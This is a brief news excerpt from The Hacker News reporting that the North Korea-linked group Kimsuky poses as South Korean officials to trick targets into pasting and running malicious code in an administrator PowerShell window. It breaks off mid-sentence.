The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code provided by them. ""To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a

by The Hacker News